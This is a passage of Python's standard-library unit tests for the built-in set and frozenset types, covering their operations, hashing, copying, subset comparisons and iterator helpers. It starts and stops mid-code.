container = set([obj, 1])
obj.x = iter(container)
del obj, container
gc.collect()
self.assertTrue(ref() is None, "Cycle was not collected")
def test_free_after_iterating(self):
support.check_free_after_iterating(self, iter, self.thetype)
class TestSet(TestJointOps, unittest.TestCase):
thetype = set
basetype = set
def test_init(self):
s = self.thetype()
s.__init__(self.word)
self.assertEqual(s, set(self.word))
s.__init__(self.otherword)
self.assertEqual(s, set(self.otherword))
self.assertRaises(TypeError, s.__init__, s, 2)
self.assertRaises(TypeError, s.__init__, 1)
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertNotEqual(id(s), id(t))
def test_set_literal(self):
s = set([1,2,3])
t = {1,2,3}
self.assertEqual(s, t)
def test_hash(self):
self.assertRaises(TypeError, hash, self.s)
def test_clear(self):
self.s.clear()
self.assertEqual(self.s, set())
self.assertEqual(len(self.s), 0)
def test_copy(self):
dup = self.s.copy()
self.assertEqual(self.s, dup)
self.assertNotEqual(id(self.s), id(dup))
self.assertEqual(type(dup), self.basetype)
def test_add(self):
self.s.add('Q')
self.assertIn('Q', self.s)
dup = self.s.copy()
self.s.add('Q')
self.assertEqual(self.s, dup)
self.assertRaises(TypeError, self.s.add, [])
def test_remove(self):
self.s.remove('a')
self.assertNotIn('a', self.s)
self.assertRaises(KeyError, self.s.remove, 'Q')
self.assertRaises(TypeError, self.s.remove, [])
s = self.thetype([frozenset(self.word)])
self.assertIn(self.thetype(self.word), s)
s.remove(self.thetype(self.word))
self.assertNotIn(self.thetype(self.word), s)
self.assertRaises(KeyError, self.s.remove, self.thetype(self.word))
def test_remove_keyerror_unpacking(self):
# bug: www.python.org/sf/1576657
for v1 in ['Q', (1,)]:
try:
self.s.remove(v1)
except KeyError as e:
v2 = e.args[0]
self.assertEqual(v1, v2)
else:
self.fail()
def test_remove_keyerror_set(self):
key = self.thetype([3, 4])
try:
self.s.remove(key)
except KeyError as e:
self.assertTrue(e.args[0] is key,
"KeyError should be {0}, not {1}".format(key,
e.args[0]))
else:
self.fail()
def test_discard(self):
self.s.discard('a')
self.assertNotIn('a', self.s)
self.s.discard('Q')
self.assertRaises(TypeError, self.s.discard, [])
s = self.thetype([frozenset(self.word)])
self.assertIn(self.thetype(self.word), s)
s.discard(self.thetype(self.word))
self.assertNotIn(self.thetype(self.word), s)
s.discard(self.thetype(self.word))
def test_pop(self):
for i in range(len(self.s)):
elem = self.s.pop()
self.assertNotIn(elem, self.s)
self.assertRaises(KeyError, self.s.pop)
def test_update(self):
retval = self.s.update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
self.assertIn(c, self.s)
self.assertRaises(PassThru, self.s.update, check_pass_thru())
self.assertRaises(TypeError, self.s.update, [[]])
for p, q in (('cdc', 'abcd'), ('efgfe', 'abcefg'), ('ccb', 'abc'), ('ef', 'abcef')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.update(C(p)), None)
self.assertEqual(s, set(q))
for p in ('cdc', 'efgfe', 'ccb', 'ef', 'abcda'):
q = 'ahi'
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.update(C(p), C(q)), None)
self.assertEqual(s, set(s) | set(p) | set(q))
def test_ior(self):
self.s |= set(self.otherword)
for c in (self.word + self.otherword):
self.assertIn(c, self.s)
def test_intersection_update(self):
retval = self.s.intersection_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if c in self.otherword and c in self.word:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.intersection_update, check_pass_thru())
self.assertRaises(TypeError, self.s.intersection_update, [[]])
for p, q in (('cdc', 'c'), ('efgfe', ''), ('ccb', 'bc'), ('ef', '')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.intersection_update(C(p)), None)
self.assertEqual(s, set(q))
ss = 'abcba'
s = self.thetype(ss)
t = 'cbc'
self.assertEqual(s.intersection_update(C(p), C(t)), None)
self.assertEqual(s, set('abcba')&set(p)&set(t))
def test_iand(self):
self.s &= set(self.otherword)
for c in (self.word + self.otherword):
if c in self.otherword and c in self.word:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_difference_update(self):
retval = self.s.difference_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if c in self.word and c not in self.otherword:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.difference_update, check_pass_thru())
self.assertRaises(TypeError, self.s.difference_update, [[]])
self.assertRaises(TypeError, self.s.symmetric_difference_update, [[]])
for p, q in (('cdc', 'ab'), ('efgfe', 'abc'), ('ccb', 'a'), ('ef', 'abc')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.difference_update(C(p)), None)
self.assertEqual(s, set(q))
s = self.thetype('abcdefghih')
s.difference_update()
self.assertEqual(s, self.thetype('abcdefghih'))
s = self.thetype('abcdefghih')
s.difference_update(C('aba'))
self.assertEqual(s, self.thetype('cdefghih'))
s = self.thetype('abcdefghih')
s.difference_update(C('cdc'), C('aba'))
self.assertEqual(s, self.thetype('efghih'))
def test_isub(self):
self.s -= set(self.otherword)
for c in (self.word + self.otherword):
if c in self.word and c not in self.otherword:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_symmetric_difference_update(self):
retval = self.s.symmetric_difference_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if (c in self.word) ^ (c in self.otherword):
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.symmetric_difference_update, check_pass_thru())
self.assertRaises(TypeError, self.s.symmetric_difference_update, [[]])
for p, q in (('cdc', 'abd'), ('efgfe', 'abcefg'), ('ccb', 'a'), ('ef', 'abcef')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.symmetric_difference_update(C(p)), None)
self.assertEqual(s, set(q))
def test_ixor(self):
self.s ^= set(self.otherword)
for c in (self.word + self.otherword):
if (c in self.word) ^ (c in self.otherword):
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_inplace_on_self(self):
t = self.s.copy()
t |= t
self.assertEqual(t, self.s)
t &= t
self.assertEqual(t, self.s)
t -= t
self.assertEqual(t, self.thetype())
t = self.s.copy()
t ^= t
self.assertEqual(t, self.thetype())
def test_weakref(self):
s = self.thetype('gallahad')
p = weakref.proxy(s)
self.assertEqual(str(p), str(s))
s = None
self.assertRaises(ReferenceError, str, p)
def test_rich_compare(self):
class TestRichSetCompare:
def __gt__(self, some_set):
self.gt_called = True
return False
def __lt__(self, some_set):
self.lt_called = True
return False
def __ge__(self, some_set):
self.ge_called = True
return False
def __le__(self, some_set):
self.le_called = True
return False
# This first tries the builtin rich set comparison, which doesn't know
# how to handle the custom object. Upon returning NotImplemented, the
# corresponding comparison on the right object is invoked.
myset = {1, 2, 3}
myobj = TestRichSetCompare()
myset < myobj
self.assertTrue(myobj.gt_called)
myobj = TestRichSetCompare()
myset > myobj
self.assertTrue(myobj.lt_called)
myobj = TestRichSetCompare()
myset <= myobj
self.assertTrue(myobj.ge_called)
myobj = TestRichSetCompare()
myset >= myobj
self.assertTrue(myobj.le_called)
@unittest.skipUnless(hasattr(set, "test_c_api"),
'C API test only available in a debug build')
def test_c_api(self):
self.assertEqual(set().test_c_api(), True)
class SetSubclass(set):
pass
class TestSetSubclass(TestSet):
thetype = SetSubclass
basetype = set
class SetSubclassWithKeywordArgs(set):
def __init__(self, iterable=[], newarg=None):
set.__init__(self, iterable)
class TestSetSubclassWithKeywordArgs(TestSet):
def test_keywords_in_subclass(self):
'SF bug #1486663 -- this used to erroneously raise a TypeError'
SetSubclassWithKeywordArgs(newarg=1)
class TestFrozenSet(TestJointOps, unittest.TestCase):
thetype = frozenset
basetype = frozenset
def test_init(self):
s = self.thetype(self.word)
s.__init__(self.otherword)
self.assertEqual(s, set(self.word))
def test_singleton_empty_frozenset(self):
f = frozenset()
efs = [frozenset(), frozenset([]), frozenset(()), frozenset(''),
frozenset(), frozenset([]), frozenset(()), frozenset(''),
frozenset(range(0)), frozenset(frozenset()),
frozenset(f), f]
# All of the empty frozensets should have just one id()
self.assertEqual(len(set(map(id, efs))), 1)
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertEqual(id(s), id(t))
def test_hash(self):
self.assertEqual(hash(self.thetype('abcdeb')),
hash(self.thetype('ebecda')))
# make sure that all permutations give the same hash value
n = 100
seq = [randrange(n) for i in range(n)]
results = set()
for i in range(200):
shuffle(seq)
results.add(hash(self.thetype(seq)))
self.assertEqual(len(results), 1)
def test_copy(self):
dup = self.s.copy()
self.assertEqual(id(self.s), id(dup))
def test_frozen_as_dictkey(self):
seq = list(range(10)) + list('abcdefg') + ['apple']
key1 = self.thetype(seq)
key2 = self.thetype(reversed(seq))
self.assertEqual(key1, key2)
self.assertNotEqual(id(key1), id(key2))
d = {}
d[key1] = 42
self.assertEqual(d[key2], 42)
def test_hash_caching(self):
f = self.thetype('abcdcda')
self.assertEqual(hash(f), hash(f))
def test_hash_effectiveness(self):
n = 13
hashvalues = set()
addhashvalue = hashvalues.add
elemmasks = [(i+1, 1<<i) for i in range(n)]
for i in range(2**n):
addhashvalue(hash(frozenset([e for e, m in elemmasks if m&i])))
self.assertEqual(len(hashvalues), 2**n)
class FrozenSetSubclass(frozenset):
pass
class TestFrozenSetSubclass(TestFrozenSet):
thetype = FrozenSetSubclass
basetype = frozenset
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertNotEqual(id(s), id(t))
def test_copy(self):
dup = self.s.copy()
self.assertNotEqual(id(self.s), id(dup))
def test_nested_empty_constructor(self):
s = self.thetype()
t = self.thetype(s)
self.assertEqual(s, t)
def test_singleton_empty_frozenset(self):
Frozenset = self.thetype
f = frozenset()
F = Frozenset()
efs = [Frozenset(), Frozenset([]), Frozenset(()), Frozenset(''),
Frozenset(), Frozenset([]), Frozenset(()), Frozenset(''),
Frozenset(range(0)), Frozenset(Frozenset()),
Frozenset(frozenset()), f, F, Frozenset(f), Frozenset(F)]
# All empty frozenset subclass instances should have different ids
self.assertEqual(len(set(map(id, efs))), len(efs))
# Tests taken from test_sets.py =============================================
empty_set = set()
#==============================================================================
class TestBasicOps:
def test_repr(self):
if self.repr is not None:
self.assertEqual(repr(self.set), self.repr)
def check_repr_against_values(self):
text = repr(self.set)
self.assertTrue(text.startswith('{'))
self.assertTrue(text.endswith('}'))
result = text[1:-1].split(', ')
result.sort()
sorted_repr_values = [repr(value) for value in self.values]
sorted_repr_values.sort()
self.assertEqual(result, sorted_repr_values)
def test_print(self):
try:
fo = open(support.TESTFN, "w")
fo.write(str(self.set))
fo.close()
fo = open(support.TESTFN, "r")
self.assertEqual(fo.read(), repr(self.set))
finally:
fo.close()
support.unlink(support.TESTFN)
def test_length(self):
self.assertEqual(len(self.set), self.length)
def test_self_equality(self):
self.assertEqual(self.set, self.set)
def test_equivalent_equality(self):
self.assertEqual(self.set, self.dup)
def test_copy(self):
self.assertEqual(self.set.copy(), self.dup)
def test_self_union(self):
result = self.set | self.set
self.assertEqual(result, self.dup)
def test_empty_union(self):
result = self.set | empty_set
self.assertEqual(result, self.dup)
def test_union_empty(self):
result = empty_set | self.set
self.assertEqual(result, self.dup)
def test_self_intersection(self):
result = self.set & self.set
self.assertEqual(result, self.dup)
def test_empty_intersection(self):
result = self.set & empty_set
self.assertEqual(result, empty_set)
def test_intersection_empty(self):
result = empty_set & self.set
self.assertEqual(result, empty_set)
def test_self_isdisjoint(self):
result = self.set.isdisjoint(self.set)
self.assertEqual(result, not self.set)
def test_empty_isdisjoint(self):
result = self.set.isdisjoint(empty_set)
self.assertEqual(result, True)
def test_isdisjoint_empty(self):
result = empty_set.isdisjoint(self.set)
self.assertEqual(result, True)
def test_self_symmetric_difference(self):
result = self.set ^ self.set
self.assertEqual(result, empty_set)
def test_empty_symmetric_difference(self):
result = self.set ^ empty_set
self.assertEqual(result, self.set)
def test_self_difference(self):
result = self.set - self.set
self.assertEqual(result, empty_set)
def test_empty_difference(self):
result = self.set - empty_set
self.assertEqual(result, self.dup)
def test_empty_difference_rev(self):
result = empty_set - self.set
self.assertEqual(result, empty_set)
def test_iteration(self):
for v in self.set:
self.assertIn(v, self.values)
setiter = iter(self.set)
self.assertEqual(setiter.__length_hint__(), len(self.set))
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(self.set, proto)
copy = pickle.loads(p)
self.assertEqual(self.set, copy,
"%s != %s" % (self.set, copy))
#------------------------------------------------------------------------------
class TestBasicOpsEmpty(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "empty set"
self.values = []
self.set = set(self.values)
self.dup = set(self.values)
self.length = 0
self.repr = "set()"
#------------------------------------------------------------------------------
class TestBasicOpsSingleton(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "unit set (number)"
self.values = [3]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 1
self.repr = "{3}"
def test_in(self):
self.assertIn(3, self.set)
def test_not_in(self):
self.assertNotIn(2, self.set)
#------------------------------------------------------------------------------
class TestBasicOpsTuple(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "unit set (tuple)"
self.values = [(0, "zero")]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 1
self.repr = "{(0, 'zero')}"
def test_in(self):
self.assertIn((0, "zero"), self.set)
def test_not_in(self):
self.assertNotIn(9, self.set)
#------------------------------------------------------------------------------
class TestBasicOpsTriple(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "triple set"
self.values = [0, "zero", operator.add]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
self.repr = None
#------------------------------------------------------------------------------
class TestBasicOpsString(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "string set"
self.values = ["a", "b", "c"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
def test_repr(self):
self.check_repr_against_values()
#------------------------------------------------------------------------------
class TestBasicOpsBytes(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "bytes set"
self.values = [b"a", b"b", b"c"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
def test_repr(self):
self.check_repr_against_values()
#------------------------------------------------------------------------------
class TestBasicOpsMixedStringBytes(TestBasicOps, unittest.TestCase):
def setUp(self):
self._warning_filters = support.check_warnings()
self._warning_filters.__enter__()
warnings.simplefilter('ignore', BytesWarning)
self.case = "string and bytes set"
self.values = ["a", "b", b"a", b"b"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 4
def tearDown(self):
self._warning_filters.__exit__(None, None, None)
def test_repr(self):
self.check_repr_against_values()
#==============================================================================
def baditer():
raise TypeError
yield True
def gooditer():
yield True
class TestExceptionPropagation(unittest.TestCase):
"""SF 628246: Set constructor should not trap iterator TypeErrors"""
def test_instanceWithException(self):
self.assertRaises(TypeError, set, baditer())
def test_instancesWithoutException(self):
# All of these iterables should load without exception.
set([1,2,3])
set((1,2,3))
set({'one':1, 'two':2, 'three':3})
set(range(3))
set('abc')
set(gooditer())
def test_changingSizeWhileIterating(self):
s = set([1,2,3])
try:
for i in s:
s.update([4])
except RuntimeError:
pass
else:
self.fail("no exception when changing size during iteration")
#==============================================================================
class TestSetOfSets(unittest.TestCase):
def test_constructor(self):
inner = frozenset([1])
outer = set([inner])
element = outer.pop()
self.assertEqual(type(element), frozenset)
outer.add(inner) # Rebuild set of sets with .add method
outer.remove(inner)
self.assertEqual(outer, set()) # Verify that remove worked
outer.discard(inner) # Absence of KeyError indicates working fine
#==============================================================================
class TestBinaryOps(unittest.TestCase):
def setUp(self):
self.set = set((2, 4, 6))
def test_eq(self): # SF bug 643115
self.assertEqual(self.set, set({2:1,4:3,6:5}))
def test_union_subset(self):
result = self.set | set([2])
self.assertEqual(result, set((2, 4, 6)))
def test_union_superset(self):
result = self.set | set([2, 4, 6, 8])
self.assertEqual(result, set([2, 4, 6, 8]))
def test_union_overlap(self):
result = self.set | set([3, 4, 5])
self.assertEqual(result, set([2, 3, 4, 5, 6]))
def test_union_non_overlap(self):
result = self.set | set([8])
self.assertEqual(result, set([2, 4, 6, 8]))
def test_intersection_subset(self):
result = self.set & set((2, 4))
self.assertEqual(result, set((2, 4)))
def test_intersection_superset(self):
result = self.set & set([2, 4, 6, 8])
self.assertEqual(result, set([2, 4, 6]))
def test_intersection_overlap(self):
result = self.set & set([3, 4, 5])
self.assertEqual(result, set([4]))
def test_intersection_non_overlap(self):
result = self.set & set([8])
self.assertEqual(result, empty_set)
def test_isdisjoint_subset(self):
result = self.set.isdisjoint(set((2, 4)))
self.assertEqual(result, False)
def test_isdisjoint_superset(self):
result = self.set.isdisjoint(set([2, 4, 6, 8]))
self.assertEqual(result, False)
def test_isdisjoint_overlap(self):
result = self.set.isdisjoint(set([3, 4, 5]))
self.assertEqual(result, False)
def test_isdisjoint_non_overlap(self):
result = self.set.isdisjoint(set([8]))
self.assertEqual(result, True)
def test_sym_difference_subset(self):
result = self.set ^ set((2, 4))
self.assertEqual(result, set([6]))
def test_sym_difference_superset(self):
result = self.set ^ set((2, 4, 6, 8))
self.assertEqual(result, set([8]))
def test_sym_difference_overlap(self):
result = self.set ^ set((3, 4, 5))
self.assertEqual(result, set([2, 3, 5, 6]))
def test_sym_difference_non_overlap(self):
result = self.set ^ set([8])
self.assertEqual(result, set([2, 4, 6, 8]))
#==============================================================================
class TestUpdateOps(unittest.TestCase):
def setUp(self):
self.set = set((2, 4, 6))
def test_union_subset(self):
self.set |= set([2])
self.assertEqual(self.set, set((2, 4, 6)))
def test_union_superset(self):
self.set |= set([2, 4, 6, 8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_union_overlap(self):
self.set |= set([3, 4, 5])
self.assertEqual(self.set, set([2, 3, 4, 5, 6]))
def test_union_non_overlap(self):
self.set |= set([8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_union_method_call(self):
self.set.update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 3, 4, 5, 6]))
def test_intersection_subset(self):
self.set &= set((2, 4))
self.assertEqual(self.set, set((2, 4)))
def test_intersection_superset(self):
self.set &= set([2, 4, 6, 8])
self.assertEqual(self.set, set([2, 4, 6]))
def test_intersection_overlap(self):
self.set &= set([3, 4, 5])
self.assertEqual(self.set, set([4]))
def test_intersection_non_overlap(self):
self.set &= set([8])
self.assertEqual(self.set, empty_set)
def test_intersection_method_call(self):
self.set.intersection_update(set([3, 4, 5]))
self.assertEqual(self.set, set([4]))
def test_sym_difference_subset(self):
self.set ^= set((2, 4))
self.assertEqual(self.set, set([6]))
def test_sym_difference_superset(self):
self.set ^= set((2, 4, 6, 8))
self.assertEqual(self.set, set([8]))
def test_sym_difference_overlap(self):
self.set ^= set((3, 4, 5))
self.assertEqual(self.set, set([2, 3, 5, 6]))
def test_sym_difference_non_overlap(self):
self.set ^= set([8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_sym_difference_method_call(self):
self.set.symmetric_difference_update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 3, 5, 6]))
def test_difference_subset(self):
self.set -= set((2, 4))
self.assertEqual(self.set, set([6]))
def test_difference_superset(self):
self.set -= set((2, 4, 6, 8))
self.assertEqual(self.set, set([]))
def test_difference_overlap(self):
self.set -= set((3, 4, 5))
self.assertEqual(self.set, set([2, 6]))
def test_difference_non_overlap(self):
self.set -= set([8])
self.assertEqual(self.set, set([2, 4, 6]))
def test_difference_method_call(self):
self.set.difference_update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 6]))
#==============================================================================
class TestMutate(unittest.TestCase):
def setUp(self):
self.values = ["a", "b", "c"]
self.set = set(self.values)
def test_add_present(self):
self.set.add("c")
self.assertEqual(self.set, set("abc"))
def test_add_absent(self):
self.set.add("d")
self.assertEqual(self.set, set("abcd"))
def test_add_until_full(self):
tmp = set()
expected_len = 0
for v in self.values:
tmp.add(v)
expected_len += 1
self.assertEqual(len(tmp), expected_len)
self.assertEqual(tmp, self.set)
def test_remove_present(self):
self.set.remove("b")
self.assertEqual(self.set, set("ac"))
def test_remove_absent(self):
try:
self.set.remove("d")
self.fail("Removing missing element should have raised LookupError")
except LookupError:
pass
def test_remove_until_empty(self):
expected_len = len(self.set)
for v in self.values:
self.set.remove(v)
expected_len -= 1
self.assertEqual(len(self.set), expected_len)
def test_discard_present(self):
self.set.discard("c")
self.assertEqual(self.set, set("ab"))
def test_discard_absent(self):
self.set.discard("d")
self.assertEqual(self.set, set("abc"))
def test_clear(self):
self.set.clear()
self.assertEqual(len(self.set), 0)
def test_pop(self):
popped = {}
while self.set:
popped[self.set.pop()] = None
self.assertEqual(len(popped), len(self.values))
for v in self.values:
self.assertIn(v, popped)
def test_update_empty_tuple(self):
self.set.update(())
self.assertEqual(self.set, set(self.values))
def test_update_unit_tuple_overlap(self):
self.set.update(("a",))
self.assertEqual(self.set, set(self.values))
def test_update_unit_tuple_non_overlap(self):
self.set.update(("a", "z"))
self.assertEqual(self.set, set(self.values + ["z"]))
#==============================================================================
class TestSubsets:
case2method = {"<=": "issubset",
">=": "issuperset",
}
reverse = {"==": "==",
"!=": "!=",
"<": ">",
">": "<",
"<=": ">=",
">=": "<=",
}
def test_issubset(self):
x = self.left
y = self.right
for case in "!=", "==", "<", "<=", ">", ">=":
expected = case in self.cases
# Test the binary infix spelling.
result = eval("x" + case + "y", locals())
self.assertEqual(result, expected)
# Test the "friendly" method-name spelling, if one exists.
if case in TestSubsets.case2method:
method = getattr(x, TestSubsets.case2method[case])
result = method(y)
self.assertEqual(result, expected)
# Now do the same for the operands reversed.
rcase = TestSubsets.reverse[case]
result = eval("y" + rcase + "x", locals())
self.assertEqual(result, expected)
if rcase in TestSubsets.case2method:
method = getattr(y, TestSubsets.case2method[rcase])
result = method(x)
self.assertEqual(result, expected)
#------------------------------------------------------------------------------
class TestSubsetEqualEmpty(TestSubsets, unittest.TestCase):
left = set()
right = set()
name = "both empty"
cases = "==", "<=", ">="
#------------------------------------------------------------------------------
class TestSubsetEqualNonEmpty(TestSubsets, unittest.TestCase):
left = set([1, 2])
right = set([1, 2])
name = "equal pair"
cases = "==", "<=", ">="
#------------------------------------------------------------------------------
class TestSubsetEmptyNonEmpty(TestSubsets, unittest.TestCase):
left = set()
right = set([1, 2])
name = "one empty, one non-empty"
cases = "!=", "<", "<="
#------------------------------------------------------------------------------
class TestSubsetPartial(TestSubsets, unittest.TestCase):
left = set([1])
right = set([1, 2])
name = "one a non-empty proper subset of other"
cases = "!=", "<", "<="
#------------------------------------------------------------------------------
class TestSubsetNonOverlap(TestSubsets, unittest.TestCase):
left = set([1])
right = set([2])
name = "neither empty, neither contains"
cases = "!="
#==============================================================================
class TestOnlySetsInBinaryOps:
def test_eq_ne(self):
# Unlike the others, this is testing that == and != *are* allowed.
self.assertEqual(self.other == self.set, False)
self.assertEqual(self.set == self.other, False)
self.assertEqual(self.other != self.set, True)
self.assertEqual(self.set != self.other, True)
def test_ge_gt_le_lt(self):
self.assertRaises(TypeError, lambda: self.set < self.other)
self.assertRaises(TypeError, lambda: self.set <= self.other)
self.assertRaises(TypeError, lambda: self.set > self.other)
self.assertRaises(TypeError, lambda: self.set >= self.other)
self.assertRaises(TypeError, lambda: self.other < self.set)
self.assertRaises(TypeError, lambda: self.other <= self.set)
self.assertRaises(TypeError, lambda: self.other > self.set)
self.assertRaises(TypeError, lambda: self.other >= self.set)
def test_update_operator(self):
try:
self.set |= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_update(self):
if self.otherIsIterable:
self.set.update(self.other)
else:
self.assertRaises(TypeError, self.set.update, self.other)
def test_union(self):
self.assertRaises(TypeError, lambda: self.set | self.other)
self.assertRaises(TypeError, lambda: self.other | self.set)
if self.otherIsIterable:
self.set.union(self.other)
else:
self.assertRaises(TypeError, self.set.union, self.other)
def test_intersection_update_operator(self):
try:
self.set &= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_intersection_update(self):
if self.otherIsIterable:
self.set.intersection_update(self.other)
else:
self.assertRaises(TypeError,
self.set.intersection_update,
self.other)
def test_intersection(self):
self.assertRaises(TypeError, lambda: self.set & self.other)
self.assertRaises(TypeError, lambda: self.other & self.set)
if self.otherIsIterable:
self.set.intersection(self.other)
else:
self.assertRaises(TypeError, self.set.intersection, self.other)
def test_sym_difference_update_operator(self):
try:
self.set ^= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_sym_difference_update(self):
if self.otherIsIterable:
self.set.symmetric_difference_update(self.other)
else:
self.assertRaises(TypeError,
self.set.symmetric_difference_update,
self.other)
def test_sym_difference(self):
self.assertRaises(TypeError, lambda: self.set ^ self.other)
self.assertRaises(TypeError, lambda: self.other ^ self.set)
if self.otherIsIterable:
self.set.symmetric_difference(self.other)
else:
self.assertRaises(TypeError, self.set.symmetric_difference, self.other)
def test_difference_update_operator(self):
try:
self.set -= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_difference_update(self):
if self.otherIsIterable:
self.set.difference_update(self.other)
else:
self.assertRaises(TypeError,
self.set.difference_update,
self.other)
def test_difference(self):
self.assertRaises(TypeError, lambda: self.set - self.other)
self.assertRaises(TypeError, lambda: self.other - self.set)
if self.otherIsIterable:
self.set.difference(self.other)
else:
self.assertRaises(TypeError, self.set.difference, self.other)
#------------------------------------------------------------------------------
class TestOnlySetsNumeric(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = 19
self.otherIsIterable = False
#------------------------------------------------------------------------------
class TestOnlySetsDict(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = {1:2, 3:4}
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsOperator(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = operator.add
self.otherIsIterable = False
#------------------------------------------------------------------------------
class TestOnlySetsTuple(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = (2, 4, 6)
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsString(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = 'abc'
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsGenerator(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
def gen():
for i in range(0, 10, 2):
yield i
self.set = set((1, 2, 3))
self.other = gen()
self.otherIsIterable = True
#==============================================================================
class TestCopying:
def test_copy(self):
dup = self.set.copy()
dup_list = sorted(dup, key=repr)
set_list = sorted(self.set, key=repr)
self.assertEqual(len(dup_list), len(set_list))
for i in range(len(dup_list)):
self.assertTrue(dup_list[i] is set_list[i])
def test_deep_copy(self):
dup = copy.deepcopy(self.set)
##print type(dup), repr(dup)
dup_list = sorted(dup, key=repr)
set_list = sorted(self.set, key=repr)
self.assertEqual(len(dup_list), len(set_list))
for i in range(len(dup_list)):
self.assertEqual(dup_list[i], set_list[i])
#------------------------------------------------------------------------------
class TestCopyingEmpty(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set()
#------------------------------------------------------------------------------
class TestCopyingSingleton(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set(["hello"])
#------------------------------------------------------------------------------
class TestCopyingTriple(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set(["zero", 0, None])
#------------------------------------------------------------------------------
class TestCopyingTuple(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set([(1, 2)])
#------------------------------------------------------------------------------
class TestCopyingNested(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set([((1, 2), (3, 4))])
#==============================================================================
class TestIdentities(unittest.TestCase):
def setUp(self):
self.a = set('abracadabra')
self.b = set('alacazam')
def test_binopsVsSubsets(self):
a, b = self.a, self.b
self.assertTrue(a - b < a)
self.assertTrue(b - a < b)
self.assertTrue(a & b < a)
self.assertTrue(a & b < b)
self.assertTrue(a | b > a)
self.assertTrue(a | b > b)
self.assertTrue(a ^ b < a | b)
def test_commutativity(self):
a, b = self.a, self.b
self.assertEqual(a&b, b&a)
self.assertEqual(a|b, b|a)
self.assertEqual(a^b, b^a)
if a != b:
self.assertNotEqual(a-b, b-a)
def test_summations(self):
# check that sums of parts equal the whole
a, b = self.a, self.b
self.assertEqual((a-b)|(a&b)|(b-a), a|b)
self.assertEqual((a&b)|(a^b), a|b)
self.assertEqual(a|(b-a), a|b)
self.assertEqual((a-b)|b, a|b)
self.assertEqual((a-b)|(a&b), a)
self.assertEqual((b-a)|(a&b), b)
self.assertEqual((a-b)|(b-a), a^b)
def test_exclusion(self):
# check that inverse operations show non-overlap
a, b, zero = self.a, self.b, set()
self.assertEqual((a-b)&b, zero)
self.assertEqual((b-a)&a, zero)
self.assertEqual((a&b)&(a^b), zero)
# Tests derived from test_itertools.py =======================================
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
